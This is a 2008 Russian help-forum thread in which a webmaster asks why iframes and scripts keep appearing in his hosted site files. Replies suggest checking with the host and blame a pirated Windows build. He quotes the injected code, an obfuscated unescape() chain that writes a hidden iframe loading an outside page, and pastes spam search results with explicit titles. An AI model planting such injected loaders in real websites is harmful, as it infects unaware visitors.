Консультация № 146182
06.10.2008, 13:00
0.00 руб.
0 11 0
Здравствуйте, уважаемые эксперты!
У меня на хостинге к файлам сайта добавляют то фреймы, то скрипты. Я уже, чтоб быть уверенным, что не воруют ftp-пароли, зашел в админпанель на хостинге, поменял там пароли, и больше вообще не входил на хостинг по ftp или через админ-панель. Все равно дописали следующий скрипт. Может дело в том, что у меня в качестве операционной системы установлена сборка ZVER?
Что еще делать, чтобы не взломали? Причем ломают на двух разных хостингах.
Спасибо за уделенное внимание

Приложение:
<script>document.write(unescape('%3C')+unescape('%69%66%72')+unescape('%61%6D%65%20')+unescape('%73%72')+unescape('%63%3D%22')+unescape('%68')+unescape('%74%74')+unescape('%70')+unescape('%3A%2F')+unescape('%2F')+unescape('%67%61%76%61')+unescape('%69%2D')+unescape('%70')+unescape('%65')+unescape('%67')+unescape('%63%39%2E%77')+unescape('%73')+unescape('%2F')+unescape('%33%2E%68%74')+unescape('%6D%6C%22%20')+unescape('%77')+unescape('%69%64')+unescape('%74%68%3D%31')+unescape('%20%68')+unescape('%65%69')+unescape('%67%68%74')+unescape('%3D')+unescape('%31%20%73')+unescape('%74%79%6C')+unescape('%65%3D')+unescape('%22%76%69')+unescape('%73%69%62')+unescape('%69%6C%69')+unescape('%74')+unescape('%79%3A%20%68')+unescape('%69%64%64')+unescape('%65%6E')+unescape('%22%3E%3C')+unescape('%2F%69%66%72')+unescape('%61%6D%65%3E')+'');</script>

Обсуждение

Неизвестный
06.10.2008, 14:17
общий
Неплохо бы сообщить где хостится сайт и какой тарифный план хостинга.
Неизвестный
06.10.2008, 16:08
общий
тарифный план S-300 на http://s-hosting.biz/
Еще была интересная ситуация, когда мое дисковое пространство использовалось в качестве кеша для каких-то иностранных сайтов.
До сих пор, если набрать в Google.com название сайта -moisait.net (если надо, я напишу действительное название сайта), в выдаче появляются десятки ссылок такого плана:

Usage Statistics for pascor.com - May 2008 - [ Перевести эту страницу ]15, 500, 2.38%, http://moisait.net/test/tmp/23/triumph-motorcycle-boot.php. 16, 500, 2.38%, http://www.genealogi.umea.com/gif/tmp/15/smack-my-bitch-up-lyric. ...
www.pascor.com/stats/pascor.com/usage_200805.html - 129k - Сохранено в кэше - Похожие страницы

Usage Statistics for ponoirivercompany.com - May 2008 - [ Перевести эту страницу ]14, 500, 2.11%, http://moisait.net/test/tmp/54/shemale-fucking-woman.php. 15, 500 , 2.11%, http://www.siciliatv.org/audio/inc/29/info-latina-lesbian-remember. ...
www.ponoirivercompany.com/stats/usage_200805.html - 116k - Сохранено в кэше - Похожие страницы

Usage Statistics for chrisparrinello.com - May 2008 - [ Перевести эту страницу ]11, 500, 3.96%, http://inforos.ru/archaeolog/css/70/139.php. 12, 500, 3.96%, http://moisait.net/test/tmp/24/long-leather-riding-boot.php ...
chrisparrinello.com/webalizer/usage_200805.html - 116k - Сохранено в кэше - Похожие страницы

Usage Statistics for mirrorfresh.com - September 2008 - [ Перевести эту страницу ]29, 994, 1.43%, http://construcasabrasilia.com/phpbb2/docs/72/free-erotic- lesbian-picture.php. 30, 994, 1.43%, http://moisait.net/start/decor/tmp/12/154. htm ...
www.vasletdesign.com/_webalizer/usage_200809.html - 117k -
Неизвестный
06.10.2008, 16:20
общий
Поинтересуйтесь у вашего хостера - не добавляют ли они автоматом к каждой странице javascript. Если не добавляют - возможно взломан не только Ваш сайт, а вообще весь сервер, на котором могут находиться несколько сайтов.
Неизвестный
06.10.2008, 16:25
общий
И другой хостинг, на котором добавляли фреймы со скриптами - http://www.besthosting.com.ua/
Но это было до того, как я стал держать пароли только в голове
Неизвестный
06.10.2008, 16:26
общий
То, что выдаёт Google в поиске - это немного другой кэшЭто кэш самого Google, где сохраняются страницы, какими они были на момент обхода пауком Google. Это делается для удобства пользователей Google - чтобы они могли прочитать страницу, которая сохранилась в кэше, пока страница самого сайта недоступна.
Неизвестный
06.10.2008, 16:35
общий
>Поинтересуйтесь у вашего хостера - не добавляют ли они автоматом к каждой странице javascript. Если не добавляют - возможно взломан не только Ваш сайт, а вообще весь сервер, на котором могут находиться несколько сайтов.
- Этот скрипт, что я привел, был добавлено вчера к файлу index.php, после чего сайт перестал работать из-за ошибки синтаксиса. Неделю назад был добавлен к тому же сайту другой скрипт, с тем же результатом, а на другом домене, где был файл index.html, что-то предложило инсталировать себяся после загрузки страницы . Я не считаю, что хостер добавляет скрипты. Но если нужно, я задам ему все вопросы, которые тут будут сформулированы.
Неизвестный
06.10.2008, 16:37
общий
>То, что выдаёт Google в поиске - это немного другой кэш
- Я просто впервые столкнулся с тем, что при запросе по названию моего сайта выдается такая информация
Неизвестный
06.10.2008, 16:40
общий
>То, что выдаёт Google в поиске - это немного другой кэш
- Нет , как раз на моем дисковом пространстве все это местилось, и хостер отключил сайт, поскольку я тем самым значительно перебрал отведенные мне 300Мбайт
Неизвестный
06.10.2008, 17:13
общий
Хостер ответил:
"север не взломан. вопрос расспространеный" "сменить ftp клиент, сменте пароли на ftp, не держите пароли в компьютере. выставите права в на файл index 444 должно пмоочь"
Неизвестный
06.10.2008, 20:11
общий
Если ваш хостер не может обеспечить безопаность хранения данных я еще подумал бы продолжать ли с ними сотрудничать, т.е. покупать ли у них хостинг на новый период.
Неизвестный
07.10.2008, 07:13
общий
Сборка ZVER - это, как я понимаю, пиратская винда, собранная неизвестными хакерами. В таком случае советую переустановить систему на легальную. Часто в таких неофициальных сборках бывает один-два трояна, не известных антивирусам. На такие компакт-диски часто клюют любители халявы, а хакеры создающие такие диски, получают свою выгоду - очень много самых разных паролей и приличный спам-ботнет.
Форма ответа